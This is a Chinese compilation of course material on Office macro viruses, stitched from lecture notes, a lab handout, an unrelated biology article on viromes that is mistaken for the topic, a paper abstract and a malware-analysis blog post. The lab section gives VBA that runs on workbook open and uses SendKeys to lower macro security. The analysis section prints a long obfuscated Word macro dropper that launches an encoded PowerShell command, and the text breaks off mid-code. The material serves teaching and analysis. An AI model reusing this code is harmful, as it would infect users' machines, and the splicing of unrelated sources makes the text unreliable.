第十讲 宏病毒分析

宏病毒原理及案例分析屈立成4114005088什么是宏？所谓宏，就是一些命令组织在一起，作为一个单独命令完成一个特定任务。

Microsoft Word中对宏定义为：“宏就是能组织到一起作为一独立的命令使用的一系列word命令，它能使日常工作变得更容易”。

Word使用宏语言Word_Basic将宏作为一系列指令来编写。

Word宏病毒是一些制作病毒的专业人员利用Microsoft Word的开放性即word中提供的Word BASIC编程接口，专门制作的一个或多个具有病毒特点的宏的集合，这种病毒宏的集合影响到计算机的使用，并能通过.DOC文档及.DOT 模板进行自我复制及传播。

宏可使任务自动化，如果在Word中重复进行某项工作，可用宏使其自动执行。

宏是将一系列的Word命令和指令结合在一起，形成一个命令，以实现任务执行的自动化。

用户可创建并执行一个宏，以替代人工进行一系列费时而重复的Word操作。

事实上，它是一个自定义命令，用来完成所需任务。

宏的一些典型应用如：加速日常编辑和格式设置、组合多个命令、使对话框中的选项更易于访问、使一系列复杂的任务自动执行等。

Word 提供了两种创建宏的方法：宏录制器和Visual Basic 编辑器。

宏录制器可帮助用户开始创建宏。

Word 在VBA 编程语言中把宏录制为一系列的Word 命令。

可在Visual Basic 编辑器中打开已录制的宏，修改其中的指令。

也可用Visual Basic 编辑器创建包括Visual Basic 指令的非常灵活和强有力的宏，这些指令无法采用录制的方式。

VBAVisual Basic for Applications（VBA）是Visual Basic的一种宏语言，是微软开发出来在其桌面应用程序中执行通用的自动化任务的编程语言。

主要能用来扩展Windows的应用程式功能，特别是Microsoft Office软件。

也可说是一种应用程式视觉化的Basic 脚本。

---------------------------------------------------------------最新资料推荐------------------------------------------------------宏病毒分析实验(新)宏病毒分析实验一、实验目的及要求：通过本实验的学习，大家应该理解宏病毒的概念、病毒机制、编写方法、传播手段以及预防处理措施。

二、实验基本原理：宏病毒是也是脚本病毒的一种，由于它的特殊性，因此在这里单独算成一类。

宏病毒的前缀是：Macro，第二前缀是：Word、 Word97、 Excel、 Excel97（也许还有别的）其中之一。

凡是只感染 WORD97 及以前版本 WORD 文档的病毒采用 Word97 做为第二前缀，格式是：Macro. Word97；凡是只感染 WORD97 以后版本 WORD 文档的病毒采用 Word 做为第二前缀，格式是：Macro. Word；凡是只感染 EXCEL97 及以前版本 EXCEL 文档的病毒采用 Excel97 做为第二前缀，格式是：Macro. Excel97；凡是只感染 EXCEL97 以后版本 EXCEL 文档的病毒采用 Excel做为第二前缀，格式是：Macro. Excel，依此类推。

该类病毒的公有特性是能感染 OFFICE系列文档，然后通过OFFICE 通用模板进行传播，如：1 / 5著名的美丽莎(Macro. Melissa) 。

一个宏的运行, 特别是有恶意的宏程序的运行, 受宏的安全性的影响是最大的, 如果宏的安全性为高, 那么, 没有签署的宏就不能运行了, 甚至, 还能使部分 Excel 的功能失效.所以, 宏病毒在感染 Excel 之前, 会自行对 Excel 的宏的安全性进行修改,把宏的安全性设为低. Application. SendKeys%TMSs%L{RETURN} 仅修改这个还不行, 很多宏会涉及到 VisualBasic, 所以, 宏的安全性还要信任对于VisualBasic 项目的访问, 所以, 综合安全级别的修改, 就为 Application. SendKeys%TMSs%LT%v{RETURN} 如何判断信任还是不信任对于VisualBasic 项目的访问, 可以用出错捕获进行修改: OnErrorGoToEnd_Sub ‘ 其它功能的程序段ExitSub End_Sub: Application. SendKeys%TMSs%LT%v{RETURN} 本段程序的功能为: 一旦宏无法正常就进行宏的安全性的修改和对信任对于VisualBasic 项目的访问的修改, 从而这宏病毒的正常运行提供系统支持. 本程序应放在 VBA 中的 ThisWorkbook PrivateSubWorkbook_Open() EndSub 这样一旦打开工作薄就会对其进行有效的修改. 完整的程序为: PrivateSubWorkbook_Open() OnErrorGoToEnd_Sub ‘ 其它功能的程序段 ExitSub End_Sub: Application. SendKeys%TMSs%LT%v{RETURN} EndSub 三、主要仪器设备及实验耗材：PC 电脑一台四、实验内容或步骤：---------------------------------------------------------------最新资料推荐------------------------------------------------------ 1．启动 Word，创建一个新文档。

病毒与宏病毒全面解读美格基因姜敬哲病毒知多少？提起病毒，人们想到的通常是SARS、埃博拉、艾滋、流感等这些令人不愉快的词汇。

事实上，病毒不仅仅影响人的健康，它们还有更重要的使命：推动自然物种的更替与演化，驱动生物地球化学的循环（Suttle等，2005）。

世上丰度最高的类群病毒是我们这个星球上丰度最高的生命体。

它们存在于世界的任意角落：从体型硕大的蓝鲸、非洲象，到肉眼无法分辨的寄生虫、细菌、衣原体等，但凡是“活”的东西，都有专门负责“办”它的病毒。

图1 常见感染人体的病毒形状和大小科学研究中的暗物质据推测，地球上的病毒种类多达8700万种，其中可能感染人类的病毒就有73万种，但目前比较确认的已知病毒却只有约5000种，已知的人类病毒仅有263种（Geoghegan 等，2017；Carroll 等，2018）。

由此可见，病毒是生命科学研究中实打实的“暗物质”。

图2 目前地球上已知和未知的病毒物种数量宏病毒组病毒和细菌不同，不同病毒基因组的差异非常大，根本没有16S rDNA这种进化保守的基因，所以无法做扩增子（Amplicon）。

2002 年，Forest Rowher课题组基于宏基因组（Metagenome）研究思路，对海水中的病毒进行了富集，高通量测序后发现大量的未知病毒（Breitbart等，2002）。

自此，宏病毒组（Virome）概念应运而生（即，组成一个特定生态系统或共生系统中所有病毒的集合）。

2018 年，由包括我国高福院士在内的多位世界级病毒专家在Science杂志上联合刊文，提出“全球病毒组计划”（GVP）（Carroll等，2018），将宏病毒组研究推到了一个全新的高度。

CNS中的常客近几年，科学家运用宏病毒组学技术对多种环境、动物、微生物、以及人类各种来源的样品进行了不少的研究，产生很多突破性成果，见刊CNS已成为常态。

代表作如，美国能源部的联合基因组研究所（JGI）针对全球3042份各种来源的样品进行的病毒组分析，共获得超过125 000个DNA病毒的基因组序列，将已知病毒基因集扩大16倍（Paez-Espino等，2016）。

宏病毒的深入分析OFFICE给用户提供了用于创建专业而优雅的文档,表格等工具，帮助用户节省时间，并得到优雅美观的结果，在当前使用中是占有巨大优势的文字，数据处理器。

它为我们的办公提供了极大的便利.OFFICE为了方便客户，提供了宏这样一个功能。

宏就是能组织到一起作为一独立的命令使用的一系列命令，它能使日常工作变得更容易，一般说来，宏是一种规则或模式，或称语法替换，用于说明某一特定输入（通常是字符串）如何根据预定义的规则转换成对应的输出（通常也是字符串)。

这种替换在预编译时进行，称作宏展开。

通俗的来说，客户事先设置好宏，需要时就可以批量使用，而不必重复操作。

然而宏也是一把双刃剑，它在让客户享受便利的同时，同时也为黑客留下了漏洞，这就是今天要分析的宏病毒。

宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。

从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。

word宏病毒通过．DOC文档及．DOT模板进行自我复制及传播，而计算机文档是交流最广的文件类型。

多年来，人们大多重视保护自己计算机的引导部分和可执行文件不被病毒感染，而对外来的文档文件基本是直接浏览使用，这给Word 宏病毒传播带来很多便利。

特别是Intemet网络的普及．Email的大量应用更为Word 宏病毒传播铺平道路。

根据国外保守的统计，宏病毒的感染率高达40％以上，即在现实生活中每发现100个病毒，其中就40多个宏病毒，而目前国际上普通病毒种类已达12000多种。

宏病毒的产生，是利用了一些数据处理系统内置宏命令编程语言的特性而形成的。

这些数据处理系统内置宏编程语言的存在使得宏病毒有机可乘，病毒可以把特定的宏命令代码附加在指定文件上，通过文件的打开或关闭来获取控制权，实现宏命令在不同文件之间的共享和传递，从而在未经使用者许可的情况下获取控制权，达到传染目的。

宏病毒的探究及防治【摘要】宏病毒是针对 Office 软件所包含的自动宏命令编写的一种具有传播、感染能力的病毒程序。

宏作为办公软件的一个创新功能，可把操作程序简化，但同时也提高了宏病毒的传播与感染率。

本文从宏病毒的概念出发，介绍了宏病毒的类型、运行机制、防治方法，以此来帮助用户在遭遇宏病毒攻击时做出正确的应对措施，保护计算机中数据的安全。

【关键词】计算机病毒；宏病毒；Office 软件计算机及网络技术的飞速发展就像把双刃剑，在便捷人们生活的同时，也为宏病毒的蔓延与传播提供了方便，虽然人们都研制出各具特色的方法来抵御宏病毒，但宏病毒具有多样性，新的病毒被消灭，就会有其他宏病毒浮出水面，这对人们抵御宏病毒工作带来了诸多麻烦。

一、宏病毒的概念所谓“宏”就是在使用软件工作时，为了避免相同的操作，用简单的语法而设计出来的一种工具，在办公软件中宏可使用一系列命令。

宏语言是用于在特定应用程序中自动执行特定序列的命令措辞，宏通过自动完成特定方法来简化复杂的过程并使其更适合。

什么叫“宏病毒”，就是针对 Office 软件所包含的自动宏命令编写的一种具有传播、感染能力的病毒程序。

宏病毒可以存在于Word、Excel、Database、PowerPoint 等数据文件中，可在一些处理数据的系统中运行，利用宏程序特殊的功能，将自己复制到其他数据处理文件中。

宏作为办公软件中一个创意性的新功能，利用宏可以帮助用户简化操作，但同时也为宏病毒的传播和感染提供了便利，但他们也产生能够处理和产生office文件的宏病毒，这使Microsoft Word 和 Microsoft Excel成为宏病毒的首要攻击对象，宏病毒可以影响 PC 和 Mac。

如图所示。

二、宏病毒的类型1.Concept病毒Concept病毒是最“有名”的宏病毒。

它于1995年首次出现，专门用于感染Microsoft Word 文档。

这也是第一次病毒通过将自身附加到文档而不是应用程序进行传播。

【宏病毒】Word宏病毒简单分析前⾔最近对Office系列宏病毒⽐较感兴趣，⽹上找了⼀个Word样本练练⼿，宏病毒常⽤套路⼀般都是利⽤PowerShell从服务器上下载PE⽂件执⾏，或者数据流中内嵌PE⽂件借助RTF释放执⾏。

所以分析宏病毒⼀般都⽐较简单，查看VBA代码基本就能知道病毒执⾏的内容，但是如果代码中的函数、变量、字符串等都经过混淆，分析起来难度就会提⾼。

详细分析诱导⽤户启⽤宏代码如果启⽤内容，宏代码就会执⾏，我们先看下⽂档中的数据流。

从"DMSojZquJ"和"wAwJBjJQJ"数据流中DUMP下宏代码，代码经过严重混淆，我们从“AutoOpen”⼦程序开始分析。

1'Attribute VB_Name = "wAwJBjJQJ"2Function RTUHFOzsK()3 SSIhYOGKB = BBqMNPjSw4 bkspY = Mid("zYsMfzXjUkZcWdEGwAVSztCl", 12, 1)5 pGHmjw = bkspY6 THZbsWKtF = GApwOicZH7 VEbORpJELT = Mid("w ULjXwAKAb", 2, 2)8 siCAq = VEbORpJELT9 HPhRfOHnm = TOvllapZt10 jpucp = Mid("dwOtbdJnhnCwfmAwZ qUwQ", 18, 2)11 aLAikTZzXH = jpucp12 fqalXfJAK = LCnHkoIcD13 VuuwVO = Mid("sXFWPUriJfKTpqQrVtOvwpYvPcmRpGfQk", 26, 2)14 FItfpaapu = VuuwVO15 OBbLUEjqi = KUOOIoowi16 FVvtMEG = Mid("HdAFDcAsATviDfWzFFzpaz pXJcWfwf", 23, 2)17 ajJRwS = FVvtMEG18 jVrCIfDvl = zLiGcJXbX19 ZrAYDPTq = Mid("iHOvIROFpzkqDsbh OWUdhlpCiwZMTtrODJzmwsH", 17, 2)20 jiAGQiQw = ZrAYDPTq21 SUWWCjAwf = vzuwToFbG22 jmtkTTkrF = Mid("wYuqqVtGZiJmAXAhOSuPBlkv ZpEnSjLlFJZnGcc", 24, 2)23 GcmZjTwn = jmtkTTkrF24 LMtwHYSki = ADrFrhRWc25 NEiTwbDXjd = Mid("ffAMXNhHaz tNilfGXhcTPPsBKcvGidzFR", 11, 2)26 RjvFUJZEqEH = NEiTwbDXjd27 LKTKBJzHw = rAsqBBCLO28 riLqL = Mid("VYSzUNAfirLhNHuvTkkpqTYI NBTb", 25, 1)29 wjCNaFw = riLqL30 iVMwDRCAv = nqFMhzLtQ31 hCfFzWOivq = Mid("HRJzsdTznHRYYLErvnJSVjftUhUujlLVzZfA", 6, 1)32 NBOCDBCM = hCfFzWOivq33 nAKjzzabj = lKCqCjSmA34 bGAdVi = Mid("RMiPstNpOmmrqQf/wzkf", 16, 1)35 uFHPYHoifcS = bGAdVi36 PNGBIBOLR = tiTviHlPK37 BzbiCjnQqm = Mid("AikEQJtLfHomiYXDjK /fbjKtsWuJLaJzImkOi", 19, 2)38 IjUTlUqWHO = BzbiCjnQqm39 EuXMYbiQq = tznZtuwvj40 rZKmALU = Mid("ijpGMkvqVjf zj", 12, 2)41 uGUWvBHvsD = rZKmALU42 RTUHFOzsK = FItfpaapu + NBOCDBCM + IjUTlUqWHO + GcmZjTwn + uFHPYHoifcS + pGHmjw + jiAGQiQw + RjvFUJZEqEH + siCAq + uGUWvBHvsD + ajJRwS + aLAikTZzXH + wjCNaFw43End Function44Sub AutoOpen()45 KlsJVlijz46End Sub1'Attribute VB_Name = "DMSojZquJ"2Function KlsJVlijz()3 KRwZOZiSb = jMiOqzLkc4 TzurouRwtt = Mid("juDEAMQA2AGIANQA5LfDuHPHXHoVdEQfRC", 3, 15)5 iKnPNTjHYUN = TzurouRwtt6 TsfRjzdCc = wGUKHjjwm7 SAIGYDAjD = Mid("Ur8BJGqnnB5Yulset %cDpiTrLVN%=wers&&set %SuZmiriSa%=JwsADfCTs&&set %KlsJVlijz%=po&&set %qfSAwAXEM%=MrqzTiJDT&&set %PqjuFnVOr%=hell&&set %SqYwAARBW%=VcQFWjpkv&&!%KlsJVlijz%!8 iBSRmkhEj = SAIGYDAjD9 XtczUhZho = sGlQtlEVs10 HdFRsCmu = Mid("zQDZhA3kAOQB7ADEAMQA2AGIAMQAwADUAYgAxADEAMQA6ADEAMQAwAFkANAA2AH4AMQAwADAMuwW3nHiNYrXXhKvuQhjarIPjtM", 8, 65)11 JZJjMfIbBG = HdFRsCmu12 PthzvLzhL = GZEufrNor13 aJFENXB = Mid("2iwApzVhvrZAEkAMQAxADEAegA0ADYAbQAxADEAMAAmADEAMAA4AH4ANAA3AHsAMQAxADYAYgA2ADYAJgAxADAAMgB+ADQANwBZADMAOQB+ADQANgB6ADgAMwBiADEAMQAyAH4AMQAwADgAWQAxAD14 TjXFztBK = aJFENXB15 zUYzrCIlv = qfMjGmrTF16 bEHOc = Mid("LnMwj8vivvwTnBW06hAzADIASQAxADEAMABZADEAMAAxACEAMQAxADkAJgA0ADUAJgAxADEAMQB6ADkAHc", 19, 62)17 AcOZjKGHd = bEHOc18 EYzRCmWTI = kzbtDFuEB19 KtWFTJiUI = Mid("flGAbQ8jdVC6Iw5wGU3kFwCpYhBY7ADkAOAA6ADEAMAA2AG0AMQAwADXlAW41AL0oV", 29, 27)20 RkSMsXZmbbj = KtWFTJiUI21 TSBfqKPHC = wXTSDLmIQ22 iBobiw = Mid("QSw3OIaCMAwAHsAMQAxADAAOgAxADAAMQAmADEAMQA2AGIANAA2ACEAMQAwADAAOgAxADAAMQBiADQANwAmADEAMQA0AEkANAA3AH4ANAA0AHoAMQAwADQAbQAxADEANgBZADEAMQA2ACYAMQAxA23 mvotcU = iBobiw24 uiSlbYuXn = TwcHoBkXB25 iaBTlajaUKt = Mid("znY7zKn7hBOVIFz6X%cDpiTrLVN%!!%PqjuFnVOr%! -e LgAgACgAKAB2AEEAUgBpAEEAYgBMAGUAIAAnACoAbQBEAFIAKgAnACkALgBuAGEAbQBFAFsAMwAsADEAMQAsADIAXQAtAEoATwBJAG4AJwAnACkA26 XvLAfRK = iaBTlajaUKt27 EZhmBvkXw = pStPHvpAV28 wLTmWqsTK = Mid("FfAHsAMQAwADUAYgAxADEANQBZADEAMQA2AH4AMQAxADQAbQTLWzcjuipSiEo", 3, 46)29 orwEYmMBR = wLTmWqsTK30 jhqckTXvK = ZriRhfKhi31 wdpalVvA = Mid("I6iEVXN1GLwpHCz8Ijwm06KbVIuAJgAxADAAMQBJADQANwAhADcAOAB7ADgAOQAhADEAMAA3AEkAOAAzAG0AMQAwADIAJgA0ADcAegA0ADQAJgAxADAANAB6ADEAMQA2AH4AMQAxADYAIQAxADEAMgB7AD32 nGmuz = wdpalVvA33 iHhXBDcFF = tDohRofBp34 IWIok = Mid("RjADIAJgA0ADMAbQAzADIAYgNG9GurhlHcLP2Co6oWzLFSwmkhv4ldioX", 3, 22)35 TBNjdzzzh = IWIok36 KbpOPFkKj = NXkOFaMGs37 AsoLI = Mid("fSiIEDACYAMwA2AG0AMQAxADQAbQA5ADcAegAxADEAMABiADEAMAAwACYAMQAxADEAegAxADAAOQAhADMAMgBJADYhjj3jjAuppqRGqKrh1T", 7, 82)38 FRdXUFElRa = AsoLI39 oLjmAfOds = VsZuljqAF40 ISYEi = Mid("BVjP8jiqhGziNiDAAOQBiADQANwBJADgAMwBiADEAMAA3ACYANgA1ADoAOAA1AFkANAA3AFkANAA0ACYAMQAwADQAegAxADEANgBiADEAMQA2ACYAMQAxADIAewA1ADgAJgA0ADcAegA0ADcAOgAxADAAOQBtA41 fizsQ = ISYEi42 tUscmqXOh = UfwOUKvrp43 mnbclQddw = Mid("iPPaU89tkLifQBor34HASQB+AHoAJwAgACkAIAB8ACAAJQB7ACgAIABbAEkAbgB0AF0AJABfAC0AYQBTACAAWwBDAEgAYQByAF0AKQdQsE", 20, 83)44 cslql = mnbclQddw45 JXbJzlNOS = GTmEXEUTm46 GbEiUOiVXw = Mid("ziITYGiIamHpoZHgB+ADgAMwB7ADEAM1t26K9TjQqMzHzEYiu", 16, 16)47 YhuVfBw = GbEiUOiVXw48 AMYpPlzuw = tHXOwuqjd49 nwTYnBKp = Mid("I3DEAMAAx6EkAh4h7va", 3, 7)50 zwsMjwQJTv = nwTYnBKp51 djUGOYYRv = vPHtuBYvi52 WrfmRXK = Mid("Jmcs93jA5rYAMQBJADMAMgB6ADEAMQAwACYAMQAwADEAIQAxADEAOQAmADQANQAmADEAMQAxAH4AOQA4AFkAMQAwADYAYgAxADAAMQAhADkAOQBtADEAMQA2AHoAMwAyAEkAMQAxADQAegA5ADc53 awBiLS = WrfmRXK54 QTIqMFnTG = urVrNrbqk55 fwizQHrrKMl = Mid("7ZNCDjkd16F3vJwZADEAMAAxAG0AMQAwADkAYgA0ADYASQA3ADgAWQAxADAAMQA6ADEAMQA2AGIANAA2AGIAOAA3AH4AMQAwADEASQA5ADgAbQA2ADcAYgAxADAAOABJADEAMAA1ADoAMQAwADE56 kzLPNEjwRpi = fwizQHrrKMl57 StzAQwpCi = qzNWqCPaM58 HYhqTVjz = Mid("NlUNOMQB7ADQANwAhADEAMQA4AHsAOAA3AG0AMQAwADMAOgA0ADcAbQA0ADQAJgAxADAANAAhADEAMQA2AG0AMQAxADYAewAxADEAMgBiADUAOAAhADQANwBiADQANwAmADkANwB6ADEAMAAwAF59 OXrPUEbnvR = HYhqTVjz60 UnXOTvRiZ = ZDBQRDQGC61 aOmzViYRI = Mid("q4zoiVLRd4XVFkAFkAOQA5ACEAOQA3AHoAMQAxADYAfgA5ADkAfgAxADAANABiADEAMgAzACEAMQAxADkAfgAxADEAI71o4", 15, 76)62 KIwkY = aOmzViYRI63 jQCKAJbwT = tXBTbniGD64 mTTdkG = Mid("09MYoVDXOQBiADEAMgAxAH4AOQA4AFkAMQAxADcAewAxADIAMQB+ADEAMAA1AG0AMQAxADAAegAxADAAMwBJADkANwB6ADEAMAAzAHoAMQAwADEAOgAxADEAMAA6ADEAMQA2ACYANAA2AG0AOQA565 CPOtaunKXFw = mTTdkG66 MDaCimYPz = cahKFjzjJ67 jENmKtocosG = Mid("Om2EAOgA5ADkAbQAxADEANgBiADMAMgBiADQANQAhADYANwBJADEAMQAxACYAMQAwADkAbQA3ADkAOgA5ADgAfgAxADAANgBiADEAMAAxAFkAOQA5AEkAMQAxADYAbQAzADIAfgA4ADcAYgA4ADMA68 IAFUul = jENmKtocosG69 KKmNnWbYG = XGbNmLAEC70 wwuaTvRloii = Mid("rizBpdohTDQANwBiADQANwAmADEAMAAxAFkAMQAwADAAYgAxADEAMQB7ADEAMQqMh4QsW0tSwB7NpOpYfO", 10, 53)71 muHlMzvW = wwuaTvRloii72 cihQlkKwW = mjSSTsdUv73 NkhKkqUcZzS = Mid("3sTuj9MB568wAFkANgA4AHoAMQAxADEASQAxADEAOQAhADEAMQAwACEAMQAwADgAWQAxADEAMQA6ADkANwBiADEAMAAwAFkANwAwACYAMQAwADUAOgAxADAAOAAhADEAMAAxAEkANAAwAG0A74 wJLOSQhR = NkhKkqUcZzS75 QzQDbKjBI = XPoWJBjXF76 fYzIS = Mid("t8Qv5AEmsBzcKQuRLtPfWP2haoJiOWTEJKWZADUAYgAxADEAMABZADMAMgAmADMANgA6ADEAMQA3AH4AMQAxADQAfgAxADAAOAB7ADEAMQA1ACYANAAxAFkAMQAyADMAYgAxADEANgBJADEAMQA0AH4AM77 bbvLjLAvSJ = fYzIS78 ctZCDozpo = oFnijRPjE79 ZXRkXlUKciC = Mid("K3jBHqR0qD19138PwR5IMndSACWcuccASQAxADAAMwB+ADEAMAAxAHoAMQAxADAAfgAxADEANgAmADEAMQA1AEkAMQAwADUAOgAxADEAMABJADkANwBtADzEX", 31, 88)80 LPwcEG = ZXRkXlUKciC81 mYCWkjbmj = iPZQlvnBa82 CaTTBtvHd = Mid("fNzJ623CmpME4BTWDGQSANQAzAHsANQAzAFkANQAxAUXUX", 21, 22)83 fcjRIRH = CaTTBtvHd84 WOvbEmVrw = VofWHZwuw85 JozUMVXQNC = Mid("IUU0INAxAH4AMQAxADUASQAxADEANQA6ADMAMgAmADMANgAmADEAMQAyAGIAOQA3AHsAMQAxADYASQAxADAANAB+ADUAOQAhADkAOAB7ADEAMQA0AGIAMQAwADEAOgA5ADcAWQAxADAANwB86 fhXwGUGo = JozUMVXQNC87 CFJqaQFQZ = PYTsvirtV88 dnCicIqnDi = Mid("0GrwGzcA1BiqDQ2HsANAAwAHsAMwA5AH4ANAA0AG0AMwA5AEkANAAxACEANQA5AG0AMwA2ACEAMQAxADAAjNwtq8wXSXLbhwY25YY", 16, 67)89 HczVFWDHVzj = dnCicIqnDi90 JKUQBsnGw = DMHzTrwkw91 ckRwBHp = Mid("66II1QkGmQO0bkrwXG7UDHLdjDEAMAAmADkANwB6ADEAMAA5ADoAMQAwADEAegAzMiwv58sW2z8", 26, 39)92 lbjqdjR = ckRwBHp93 QjnfWnMGT = cctziOEnj94 nRJpoij = Mid("JwuGuPV1D5MOLRcplDEAMQAwAGIANAA2AGIAMQAwADAAYgAxADAAFm3RsjWO", 18, 35)95 SPEOqDL = nRJpoij96 imEQCTSBE = SPEcvKlaM97 zGITmmFi = Mid("nXkCVcOVDCIGIANQA0ACEANAAxAHsANQA5AFkAMwA2AG0AMQAxADIAOgA5ADcAewAxADEANgBJADEAMAA0AHoAMwAyAEkANgAxAG0AMwAyAHoAMwA2AFkAMQAwADEAWQAxADEAMAB6ADEAMQA4AFk98 rBTCHaK = zGITmmFi99 hdnhDuYKd = FGitvjHSw100 tkqnlH = Mid("wdHfrVfjbwADcAOgAxADEANwB7ADEAMQA1ACYANAA1AHoAMQAwADIAYgAxADAAOAB6ADEAMAAxAH4AMQAwADUAWQAxADEANQBZADkAOQAhADEAMAA0AH4AMQAwADkAYgA5ADcAYgAxADEAMAB6A11BH3 101 ScIOzQwUMHj = tkqnlH102 szdUNVjur = PzhiLEBWJ103 wzamU = Mid("whNAB6ADEAMAA4AGIANAA2AG0AOAA0AGIAMQAxADEAfgA4ADMAegAxADEANgBiADEAMQA0AG0AMQAwADUAbQAxADEAMAA6ADEAMAAzACEANAAwAG0ANAAxAHoANAA0AHoAMwAyACEAMwA2AG0A4vOqB 104 MthJuYP = wzamU105 vziJsrqMu = WYTXVcMta106 cqwMU = Mid("QjnkEoQif0vzwRUpzj9DcrA5AH4AMQAxADQAWQAxADAANQB+ADEAMQAyACEAMQAxADYAOgAzADIAWQA2ADEAbQAzADIAWQAxADEAMAAhADEAMAAxADoAMQAxADkAYgA0ADUAIQAxADEAMQBU0ntYjnSDmq 107 EbUQjFzQMji = cqwMU108 jNQSzJDJL = wWvdrZWLV109 OfVqJ = Mid("TiRt3HNPcKQFXzYzD5zBEbGwegA5ADcAIQAxADAAOQA6ADEAMAAxACYAMwAyAH4ANgAxAFkAMwAyAH4AMwA2AH4AYQhknD2", 25, 64)110 hpdwFmXNaN = OfVqJ111 PiHliAaNV = XriEVRdSI112 IwiDSbtjXNM = Mid("HqijWfnLLYUcpowUZTMNFWFwA2ADEAbQX2fLZc1w1PPk7JVF", 24, 9)113 LJIEujI = IwiDSbtjXNM114 sdzZGijtp = zshuBJHwL115 XNpKBSQp = Mid("kf6rX0J0wo7sLii6ADEAMQAxAH4AMQAxADAAJgA0ADYAWQA3ADcAYgAxADAAMQB7ADEAMQA1AFkAMQAxADUAegJ2BQk9m", 16, 71)116 LPjrKRijIw = XNpKBSQp117 SzjQrknfR = jrBdAZQdi118 jwrGYdkzCNC = Mid("AtDEANABZADEAMAA1ADoAMQAxADIAIQAxADEANgAmADQAN6f6zpUDiWd", 3, 44)119 EzTYX = jwrGYdkzCNC120 WqbZFkKbV = ncqVzZGKU121 CmzXsmGKojc = Mid("rTCDYRjjiCNAA6ADEAMAA1AH4AMQAxADYASQAxADAAMQB6ADQANQA6ADEAMAA0AGIAMQAxADEAIQAxADEANQBJADEAMQA2AEkAMwAyADoAMwA2AFkAOQA1ACYANAA2AEkANgA5ACYAMQAyADA 122 QYpwllzTSck = CmzXsmGKojc123 ZclPlaQAC = oWrIiXalF124 mAwtjzQ = Mid("dkAOgAxADAAOAA6ADEAMAA1ACEAMQAwADEAOgAxADEAMABZADEAMQA2AFkANAA2uJOYi2zO48HmdXNomG2zwpfcShY3M2zJnYLB", 2, 62)125 ZbAAifkPrvN = mAwtjzQ126 jtszGQPAD = bKtbWpErB127 oWJLO = Mid("i3TbIXnBQGAxADIAMwBZADMANgB+ADEAMQA5ACYAMQAwADEAegA5ADgAegA5ADjWE", 11, 52)128 DGLkaA = oWJLO129 zHFAIEhVF = dfwTvMTXR130 EKYFiRhEXFw = Mid("KnNUzlTmADEAMAAwADoAMQAxADEAJgAxADAAOQA6ADQANgB7ADEAMQAwADoAMQAwADEAegAxADIAMABJADEAMQA2AH4ANAAwAG0ANAA5AFkANAA0AFkAMwAyACYANQA0AG00PriiWvtTcTzBJm2 131 zSGEI = EKYFiRhEXFw132 cZWVzlXoq = JMzCDmWdd133 SFdjwWp = Mid("zPHvKMQAxADIASQA5ADcAWQAxADEANgBiADEAMAA0ACEANAAxACEANQA5AHoAOAAzADoAMQAxADYASQA5ADcASQAxADEANAA6ADEAMQA2AHoANAA1AGIAOAAwAFkAMQAxADQAYgAxADEAMQAhADk 134 OkBajT = SFdjwWp135 ziknRkKlU = EIPhIwXbR136 DcABZPAtp = Mid("Ph4HGzYkfOCGqZiwdDGa3TvRI46jLtBiSAzADkAIQA0ADYAIQAxADAAMQA6ADEAMgAwAHsAMQAwADEAJgAzADkAfgA1ADkAfgAxADAAMgA6ADEAMQAxACEAMQAxADQAegAxADAAMQAmADkANwB+ADkAOQ 137 CWMpLVkSS = DcABZPAtp138 ibHUdTOYI = FabLwRiUp139 cBUrWQJBDX = Mid("XmOJgAxADAAOAA6ADEAMQA1AGIzN3QzjhpYQj5G3IKoCPMI", 4, 23)140 lcPiAkbq = cBUrWQJBDX141 hpIlKOQSj = bbEBfbVrB142 MvpXHXC = Mid("z5nzXvB8SLdaMXOJ2AMwAyAEkANgAxACYAMwAyAGIAMwA5ACYAMQAwADQAWQAxADEANgB+ADEAMQA2AEkAMQAxADIAJgA1ADgAYgA0ADcAJgA0ADcAbQA5ADSC", 18, 103)143 HnZjzd = MvpXHXC144 WiEQYtbFL = stLzwnJqm145 vajVOP = Mid("RGKthsDsJzwtA5ADcAYgAxADAAMwBJADEAMAAxAHsANQA5AFkAMQAyADUAfgAxADIANQAnAC4AcwBQAEwAaQBUACgAIAAnAFkAJgB7AG0AOgBiACE8UDpdPzMzSYXt3P57", 13, 101)146 GzjkYUBnqXG = vajVOP147 JtQsEKnnw = DEvzqFPLp148 kEROiFMIq = Mid("j4Ja9dOW453qN2YADEAMAA5AEkZA0c3hwNX3JwzjtcQXbvF6aP", 16, 11)149 icAYwsLVpUA = kEROiFMIq150 kQQOJFDXZ = UddQropLw151 irUIcwRD = Mid("Au1EHs6ti0AmADUAOQB6ADMANgAmADEAMQA3AHsAMQAxADQA7Wj9C5z0PqNsb2IoN9LTqN", 11, 38)152 bapZdDJB = irUIcwRD153 kdaudlwYB = PtDFhmwZZ154 iFmWVaPu = Mid("AX2dCwbGzBwRzR0B9ACAAKQAtAEoATwBpAG4AJwAnACAAKQA=57cAXn5i8m8q2JvPWDXAo", 16, 34)155 KbFniuHlZAr = iFmWVaPu156 WujLpjlSJ = TnMGKiHih157 hfcbdZkXOQ = Mid("MofaM2kwYCF3hI3pREPq5wADEAWQA5ADkAhBAoZ3SX", 22, 13)158 OWGLMOBo = hfcbdZkXOQ159 OpniRlEni = VOwqRSPSQ160 zXXPDkaDCDf = Mid("UMBH8K03MAPWjNr4AA0AHsAMQAwADEAYgAxADAAOAB+ADEAMAA4AGIANQA5ACYAMwA2ACEAMQAxADkAegAxADAAMQBZADkAOAAmADkAOQB6ADEAMAA4AEkAMQAwADUAewAxADAAMQBZADEA 161 iCUMSYusIv = zXXPDkaDCDf162 OZouIKbdk = oJiYwCEkj163 pDDDLci = Mid("5l8w3MoVMQAxADQAOgA5ADcAegAxADEAMAArVwfzX20rok3a", 9, 27)164 NwSKajzAjmw = pDDDLci165 lrczHCBPD = NcVurrNsF166 cYFmodmUji = Mid("Xr8i8vwXK63tEGUAFM4fpIlA5ADcASQAxADEANgB7ADEAMAA1AGIAMQAwADEAIQAxADAANwBtADkANwBZADEAMQAwACYAMQAxADYASQAxADEAMQBiADEAMQAxAG0AMQAxADQAWQA5ADkAewAxADAA 167 kKRBFkTYOSq = cYFmodmUji168 tThcDoAPi = vzQtlhidb169 FPmzKLZZjn = Mid("UZV2SLzYBcmKjhjOAB7ADEAMAA2ADoAMQAuW61n", 16, 19)170 